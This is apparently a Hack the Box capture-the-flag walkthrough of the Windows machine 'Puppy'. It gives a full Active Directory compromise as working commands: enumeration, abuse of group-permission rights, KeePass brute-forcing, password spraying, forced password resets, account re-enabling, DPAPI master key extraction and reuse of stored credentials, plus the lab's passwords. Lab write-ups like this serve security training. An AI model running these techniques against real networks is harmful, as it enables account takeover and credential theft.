Puppy Medium Machine - Hack the Box
Medium-level Windows machine from Season 8.
Information
Puppy Machine is a medium-level Windows machine from Season 8.
As is common in real life Windows pentests, you will start this box with credentials for the following account:
levi.james / KingofAkron2025!
Tools
- nmap
- crackmapexec
- smbclient
- bloodhound
- keepass4brute
- evil-winrm
- impacket
Step by step
- Start with Nmap scan for open ports and services:
1
nmap -T4 -p- -v -A -oX puppy_tcp.scan 10.10.11.70 --webxml
We found many open ports and the domain name: PUPPY.HTB
- Samba share listing:
1
smbclient -L //10.10.11.70 -U levi.james --password=KingofAkron2025!
1 2 3 4 5 6 7 8
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share DEV Disk DEV-SHARE for PUPPY-DEVS IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share
If we try to access to DEV shared folder we would see a permission error.
- Bloodhound recopilation:
1
bloodhound-python -d PUPPY.HTB -u levi.james -p "KingofAkron2025!" -gc dc.puppy.htb -c all -ns 10.10.11.70
On Bloodhound we found many users and groups. Two interesting groups are “Developers” and “Senior Devs” and their users.
Looking relationships from the only user we have (levi.james) we can see that he is part of the “HR” group and this group has “GenericWrite” to “Developers” group. - We can abuse the “GenericWrite” relation adding the user “levi.james” to the “Developers” group:
1
net rpc group addmem "Developers" "levi.james" -U "PUPPY.HTB"/"levi.james"%"KingofAkron2025!" -S "DC.PUPPY.HTB"
We can check if the previous command was successful:
1
net rpc group members "Developers" -U "PUPPY.HTB"/"levi.james"%"KingofAkron2025!" -S "DC.PUPPY.HTB"
Now, we should have access to the “DEV” shared folder:
1 2 3 4 5 6 7 8
smbclient //10.10.11.70/DEV -U levi.james --password=KingofAkron2025! smb: \> dir . DR 0 Sun Mar 23 04:07:57 2025 .. D 0 Sat Mar 8 13:52:57 2025 KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 04:09:12 2025 Projects D 0 Sat Mar 8 13:53:36 2025 recovery.kdbx A 2677 Tue Mar 11 23:25:46 2025
Projects is an empty folder but we can download the “recovery.kdbx” file and check if we can see the content.
- The “recovery.kdbx” file is password protected but we can attempt to bruteforce the password:
1
./keepass4brute.sh /HTB/Season8/Puppy/recovery.kdbx /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Obtained the password, we can proceed to open the file and see the content.
Inside the file we found many users and passwords. - Trying password spray with the users and passwords we found:
1
crackmapexec smb 10.10.11.70 -u users.txt -p passwords.txt --continue-on-success
One of the users has a valid password: ant.edwards
- Looking on Bloodhound we can see that levi.james and ant.edwards doesn’t have permission to remote access but adam.silver have it.
From ant.edwards user we found a relation “GenericAll” to adam.silver so we can abuse it from many ways, one of them is changing his password.1
net rpc password "adam.silver" "Test12345!" -U "PUPPY.HTB"/"ant.edwards"%"Antman2025!" -S "DC.PUPPY.HTB"
Now, we should have access through evil-winrm but one particular problem with adam.silver is that the user is disabled so we need to enable it first.
1
bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p Antman2025! remove uac adam.silver -f ACCOUNTDISABLE
1
evil-winrm -i 10.10.11.70 -u adam.silver -p Test12345!
USER FLAG PWNED
Browsing through evil-winrm we found a site backup located in C:\Backups
- Downloading the previous mentioned backup, descompressing and looking into it we should see a XML.BAK file. Inside this file we found a new password for the user steph.cooper.
From our previous Bloodhound research, steph.cooper has remote access permission and there is another similar user: steph.cooper_adm.
Looks like that steph.cooper has two separate accounts for different tasks (i.e administrative tasks) so we can think that steph.cooper uses this admin account from the normal one to access/read/write files/folders that he doesn’t normally have access to. - Following our idea, we can search for encripted files using DPAPI (i.e network stored credentials) and try to bruteforce the masterkey to decrypt the content of these files.
We should see the master key located in:1
C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
If we try to download it with evil-winrm we would get an error, so we can try to do a base64 encode/decode:
1
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"))
And then:
1
echo "base64encoded" | base64 -d > master.key
For encrypted files, some of the normal locations are: C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials, C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials, C:\Users\steph.cooper\AppData\Local\Microsoft\Vault, etc.
- From one of the previous mentioned locations we found a stored network credential for the user: steph.cooper_adm.
1 2 3 4 5 6 7 8 9 10
CREDENTIAL LastWritten : 2025-03-08 15:54:29 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATIONùCRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE) Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD) Target : Domain:target=PUPPY.HTB Description : Unknown : Username : steph.cooper_adm Unknown : FivethChipOnItsWay2025!
Now, we can try to access with this user:
1
evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p FivethChipOnItsWay2025!
SYSTEM FLAG PWNED